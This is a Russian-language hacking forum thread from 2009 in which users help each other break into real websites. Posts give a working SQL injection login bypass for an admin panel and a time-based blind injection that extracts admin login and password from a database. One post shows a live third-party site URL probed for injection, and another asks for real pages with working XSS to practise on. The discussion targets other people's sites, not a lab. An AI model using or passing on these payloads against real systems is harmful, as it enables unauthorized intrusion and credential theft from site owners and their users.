03.06.2009, 20:02
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
SeNaP, откуда этот код ? Ты конкретный сайт хекаешь ? Кинь ссылку сюда либо мну в пм либо попробуй сам то что я написал
.php?login=-1'+union+select+123--+&p=123
Ты должен попасть в админку (но только если magic_quotes_gpc=off)
|
|
|
03.06.2009, 20:11
|
|
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
С нами:
9230096
Репутация:
464
|
|
плизз дайте кто ссылку на сервис для перевода в чар и sql hash (типа 0x3a).
все спомнил))) если надо то вот x3k.ru
|
|
|
|
03.06.2009, 20:15
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
С нами:
9035873
Репутация:
317
|
|
плизз дайте кто ссылку на сервис для перевода в чар и sql hash (типа 0x3a).
вот хороший сервис....
http://noxak.ru/tools/
|
|
|
|
03.06.2009, 20:16
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами:
10441826
Репутация:
1861
|
|
все же советую сделать как ElteRUS, более рационально, чтобы попасть именно в админку, но если ты захочешь юзать скуль для других целей, вот тебе пример запроса
?login=999'+or+if(ascii(substring ((select+concat_ws(0x3a,login,pass)+from+superadmi n+limit+0,1),1,1))>1,BENCHMARK(1000000,md5(current_date)),2)--+
в случае истинности условия, ответ от сервера будет приходить с запозданием |
|
|
|
03.06.2009, 20:29
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами:
9347610
Репутация:
165
|
|
Сообщение от Iceangel_
все же советую сделать как ElteRUS, более рационально, чтобы попасть именно в админку, но если ты захочешь юзать скуль для других целей, вот тебе пример запроса
в случае истинности условия, ответ от сервера будет приходить с запозданием
Чёт не какой ошибки, сервер работает без опоздания 
|
|
|
|
03.06.2009, 21:09
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Значит мэджики включены.
|
|
|
|
04.06.2009, 19:18
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Кто знает,от какого двига табла KBArticle
|
|
|
|
05.06.2009, 12:55
|
|
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
С нами:
8976875
Репутация:
239
|
|
http://www.infoboard.com.ua/?url=advertisement&action=find&find_done=1&ad=4&ru br[18]=18'
собственно здесь не пойму как и че, кто подскажет? 
|
|
|
|
05.06.2009, 14:56
|
|
Новичок
Регистрация: 24.11.2008
Сообщений: 24
С нами:
9189896
Репутация:
44
|
|
У меня скорее просьба чем вопрос. Почитал много статей по XSS, скорее даже все. Напишите пожалуйста сюда или в личку страницу любую в инете с рабочей хсс и укажите поле, хочу попробовать найти т.к. не совсем верно понимаю систему поиска (в частности как страница реагирует на вводимые '';!--"<XSS>=&{()} например) и вообще в каком месте она должна реагировать
|
|
|
|
05.06.2009, 15:06
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
С нами:
9035873
Репутация:
317
|
|
Напишите пожалуйста сюда или в личку страницу любую в инете с рабочей хсс
Посмотри в этой теме
--->
Активные XSS
<---
Тут достаточно много активных XSS выложено...
Последний раз редактировалось farex; 05.06.2009 в 15:08..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
